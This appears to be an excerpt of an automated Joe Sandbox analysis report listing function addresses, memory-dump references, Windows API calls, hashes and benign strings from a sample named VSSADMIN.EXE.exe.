                                                                                                                                                                      • Instruction Fuzzy Hash: EF017520B1DE8392FE209724D8863B51275AF5AB96F400133D84DC7292EE5DE155C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8BAA0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                      • Opcode ID: 87663b63aee2c8a84d417a22dd3cc71da84cd46cd72d182d0421c23b89921904
                                                                                                                                                                      • Instruction ID: 2e40456ab58387b5b3d3ced8f526ecf2c6219b08c69dc03f75355d0f082e8f35
                                                                                                                                                                      • Opcode Fuzzy Hash: 87663b63aee2c8a84d417a22dd3cc71da84cd46cd72d182d0421c23b89921904
                                                                                                                                                                      • Instruction Fuzzy Hash: DBD1D572B18E828AE711CF75D4802AC37B1FB56BA8B404136EF5D97B99EE38D416D300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8C460 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C57C
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C607
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                      • Opcode ID: e65a1ef3f10fff74d3232b46e78c6d325de19383b218cad3662b4f5595b6db4d
                                                                                                                                                                      • Instruction ID: 8ec18fb021b556b2e0f1d3e6acc8e776c965f3dcf430bb9058c7f304fe65182d
                                                                                                                                                                      • Opcode Fuzzy Hash: e65a1ef3f10fff74d3232b46e78c6d325de19383b218cad3662b4f5595b6db4d
                                                                                                                                                                      • Instruction Fuzzy Hash: D991CF32A18E5395F7608F6594C42BD2BB0BB46FA8F54513BDE0EA3A95DF38D482D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2DF1 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Operation not permitted$unknown
                                                                                                                                                                      • API String ID: 1452528299-31098287
                                                                                                                                                                      • Opcode ID: 94f8c0897b9262b15903971c95efbd7132c9d309cbad33c9c887f12970751b17
                                                                                                                                                                      • Instruction ID: 6d4def61f283320f91e180946809595e99d8e1600e6ea36ba553c245dafe003c
                                                                                                                                                                      • Opcode Fuzzy Hash: 94f8c0897b9262b15903971c95efbd7132c9d309cbad33c9c887f12970751b17
                                                                                                                                                                      • Instruction Fuzzy Hash: E0817A62B08A5B86FB18AB11E8343B923A4FB80B84F444531DF5E47296DF7CE448E741
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8E90C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                      • Opcode ID: 3936f9fd064f0a2d12ee265f0d959771fab9af5f8a09d4fe6c43307fbcccf919
                                                                                                                                                                      • Instruction ID: 18f7f7ec65ed05b9de3eaf02fb1f48b45cf8e88610e79f34814b461ec7ee7253
                                                                                                                                                                      • Opcode Fuzzy Hash: 3936f9fd064f0a2d12ee265f0d959771fab9af5f8a09d4fe6c43307fbcccf919
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E51D672F049228AEB14DB64D9C56BC27B1BB56B78F504136DE1ED3AE5DF38A402CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C84804 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                      • Opcode ID: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction ID: dd55b42f2fde5e925cf492ec1fec847b750e0a2bf12d2e3cab28159a11257e2f
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B518222E08A528AFB24DFB5D4903BD73B5AF46F68F10453ADE4D87689EF38D4419704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                      • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction ID: 827ab80cacc80360e28ac13ff821de4bd6941a9723479130775979797aff58cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 04118631E1C94243FA549769E5842B952B3FBCAFA1F484132E94987B99CE2DD5858200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B5B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                      • Instruction ID: 7f69d9357170e07e26837de23a0613233fc01596517e9ceb7176968b1c8b03d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                      • Instruction Fuzzy Hash: D3113326B14F419AEF00CF64E8942B933B4FB19B68F440D32EA6D87764EF79D1958380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C94D6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: ?
                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                      • Opcode ID: 2e715f355c6c22707ad3ed73b30a5419481e2ec4998e467f77e94f1bde601fe4
                                                                                                                                                                      • Instruction ID: 6243723ece32913ec4bcdc482baa7c948107280c40b936d205852b500f1de186
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e715f355c6c22707ad3ed73b30a5419481e2ec4998e467f77e94f1bde601fe4
                                                                                                                                                                      • Instruction Fuzzy Hash: 28410812A0CA8365FB649B25D58137AE6B0EB82FB8F144236EE5C87AD5DF3ED441C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2748 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                                                                                                                                      • API String ID: 3568877910-2648760357
                                                                                                                                                                      • Opcode ID: 4f01d9f861e9c6c8f70647b046dc82b808f72db07d97631f436a9c698cc874c8
                                                                                                                                                                      • Instruction ID: 0be836f15ca10f036772348612b459bded6037d5135295d1912b8e6ade927ab8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f01d9f861e9c6c8f70647b046dc82b808f72db07d97631f436a9c698cc874c8
                                                                                                                                                                      • Instruction Fuzzy Hash: BF515D72B187858AE764CF19F49066AB7A0FB89B50F444135EB8D87B59EF3CE4449B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF1613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: getaddrinfo
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_addr.c
                                                                                                                                                                      • API String ID: 300660673-2547254400
                                                                                                                                                                      • Opcode ID: a2c99f71c7972fb3b7ba828c59694e00382d0b8ec626129309ba30accd8ab733
                                                                                                                                                                      • Instruction ID: 0e454ae40ad5d8c38936c04922c8d928e6adc8cc45094cf4937343913d05a3b7
                                                                                                                                                                      • Opcode Fuzzy Hash: a2c99f71c7972fb3b7ba828c59694e00382d0b8ec626129309ba30accd8ab733
                                                                                                                                                                      • Instruction Fuzzy Hash: E441B472B1878A87EB58DF26E4906BE7751FB84740F004139EB8943B85DF7CD855AB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C87E9C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C87ECE
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF614C7B135), ref: 00007FF614C87EEC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                      • API String ID: 3580290477-1688815890
                                                                                                                                                                      • Opcode ID: 32394b7523a72a158e8e671d07237236857a66eb30a973d43268576dac4f19c3
                                                                                                                                                                      • Instruction ID: 0b2ca9aeb5763d4a833c3ab8aaa6e583eb0686974bacee5ada8daabe44179aa5
                                                                                                                                                                      • Opcode Fuzzy Hash: 32394b7523a72a158e8e671d07237236857a66eb30a973d43268576dac4f19c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B414D32A09E5385E7159F26D8C00B967B4EB46FE4B544037EA4E87B85DF3DE8519310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF37EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                      Download Yara Rule
